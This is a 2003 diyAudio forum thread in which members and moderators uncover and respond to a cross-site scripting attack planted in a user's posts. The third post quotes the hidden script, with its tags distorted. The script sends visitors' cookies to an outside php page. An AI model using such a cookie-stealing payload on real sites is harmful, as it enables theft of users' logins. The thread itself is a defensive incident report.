What the "hack" is this? - diyAudio
Go Back   Home > Forums > Site > Forum Problems

Forum Problems If there is a forum related problem please leave a message here so an Admin will see it.

Please consider donating to help us continue to serve you.

Ads on/off / Custom Title / More PMs / More album space / Advanced printing & mass image saving
Reply
 
Thread Tools Search this Thread
Old 16th June 2003, 06:36 PM   #1
Netlist is offline Netlist  Belgium
diyAudio Moderator Emeritus
 
Netlist's Avatar
 
Join Date: Jan 2003
Default What the "hack" is this?

Clicking on a thread which contains a post from programx, I get redirected to http://members.lycos.nl/protect0rzga...dio.com/forums
This seems to reveal quite a lot of my personal information.
Looking at the posts from programx you see nothing, but in this list a strange script appears.
Is this normal or is this only a test from programx or the moderators or the board software.
http://diyaudio.com/forums/search.ph...earchid=259833
/Hugo
  Reply With Quote
Old 16th June 2003, 06:52 PM   #2
dhaen is offline dhaen  Europe
diyAudio Moderator Emeritus
 
dhaen's Avatar
 
Join Date: Jun 2002
Location: U.K.
Same here. I thought it was a problem at my end....
  Reply With Quote
Old 16th June 2003, 06:55 PM   #3
dhaen is offline dhaen  Europe
diyAudio Moderator Emeritus
 
dhaen's Avatar
 
Join Date: Jun 2002
Location: U.K.
Could it be this bit of invisible code in his posts:

<s********ript>window.open('http://members.lycos.nl/protect0rzgame/1.php?Bericht='+document.cookie+'&Bericht2=http://www.diyaudio.com/forums');</scr****ipt></font></p>

(script commands have been deliberately distorted to save replication)


Maybe the moderators should be more careful....
  Reply With Quote
Old 16th June 2003, 07:18 PM   #4
jleaman is offline jleaman  Belgium
Banned
 
Join Date: Apr 2002
Send a message via AIM to jleaman
every time i click on a link i get spamed with posting's
Attached Images
File Type: jpg post.jpg (75.7 KB, 203 views)
  Reply With Quote
Old 16th June 2003, 07:55 PM   #5
Warp Engineer
On Holiday
 
AudioFreak's Avatar
 
Join Date: Oct 2001
Location: Queensland, Australia
Thanks for bringing my attention to this. Programx has been banned pending investigation. It is hard to tell the extent of the information stolen from a user when redirected to that script but there are good odds that complete login details have been stolen. Anyone who thinks they may have been affected should change their password as a matter of urgency. On behalf of the forum, its administrative team, the moderators and the site owner I would like to state once and for all that this was none of our doing.
__________________
- Dan
  Reply With Quote
Old 16th June 2003, 08:17 PM   #6
Netlist is offline Netlist  Belgium
diyAudio Moderator Emeritus
 
Netlist's Avatar
 
Join Date: Jan 2003
Quote:
Originally posted by AudioFreak
On behalf of the forum, its administrative team, the moderators and the site owner I would like to state once and for all that this was none of our doing.
Thanks AudioFreak
Of course it was never my intention to accuse the mods.
I have a rather high S/N ratio in feeling when something is wrong.
IMHO, the name "programx" and the location "test" was a good indication.
A real smart guy would have done better

/Hugo
  Reply With Quote
Old 16th June 2003, 08:25 PM   #7
dhaen is offline dhaen  Europe
diyAudio Moderator Emeritus
 
dhaen's Avatar
 
Join Date: Jun 2002
Location: U.K.
Just a thought,

Was it wise to put through so many posts that had zero contibution? Stinks like a rat
  Reply With Quote
Old 16th June 2003, 08:35 PM   #8
diyAudio Moderator
 
pinkmouse's Avatar
 
Join Date: Apr 2002
Location: Chatham, England
Quote:
Originally posted by dhaen
Just a thought,

Was it wise to put through so many posts that had zero contibution? Stinks like a rat
Believe it or not, us mods don't censor much, and we always err on the side of letting things through. Although we try to keep as tight a ship as possible, sometimes these things just slip through the cracks , sorry.

As AF said above, one of the best things you can do for your own security and peace of mind is regularly change your passwords, and this applies not just to diyAudio, but the 'net in general.
__________________
Rick: Oh Cliff / Sometimes it must be difficult not to feel as if / You really are a cliff / when fascists keep trying to push you over it! / Are they the lemmings / Or are you, Cliff? / Or are you Cliff?
  Reply With Quote
Old 17th June 2003, 02:41 AM   #9
Jason is offline Jason  Australia
:)
diyAudio Administrator
 
Jason's Avatar
 
Join Date: Oct 2000
Location: Melbourne
Blog Entries: 1
HTML has been disabled across the board to prevent this happening again. Sorry if it breaks some older posts using image tags etc.

Allowing HTML in posts is sadly in this day and age really limited to intranet applications, where theives do not roam freely.
  Reply With Quote
Old 17th June 2003, 07:15 AM   #10
dhaen is offline dhaen  Europe
diyAudio Moderator Emeritus
 
dhaen's Avatar
 
Join Date: Jun 2002
Location: U.K.
Default Disabled html

It's a shame really, but I suppose it was a bomb waiting to be ignited.
Thank you, I feel safer now.
  Reply With Quote

Reply


Hide this!Advertise here!
Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
What makes an amplifier "bright", "warm", or "neutral"? JohnS Solid State 51 13th December 2009 06:42 PM
"Void free" or "no core gaps" plywood rick57 Multi-Way 6 14th March 2007 01:09 PM
Fostex "rated input" and "music power" hugz Full Range 12 16th March 2006 04:33 PM
Some final pics of "Stacks" revisited and "Askew" with stand Andy G Multi-Way 2 3rd February 2005 06:07 AM
Anyone used Scan-Speak's "Flow Resistors" or "Aperiodic Vents"? Ignite Multi-Way 3 18th November 2001 08:42 AM


New To Site? Need Help?

All times are GMT. The time now is 02:40 AM.


vBulletin Optimisation provided by vB Optimise (Pro) - vBulletin Mods & Addons Copyright © 2014 DragonByte Technologies Ltd.
Copyright ©1999-2014 diyAudio

Content Relevant URLs by vBSEO 3.3.2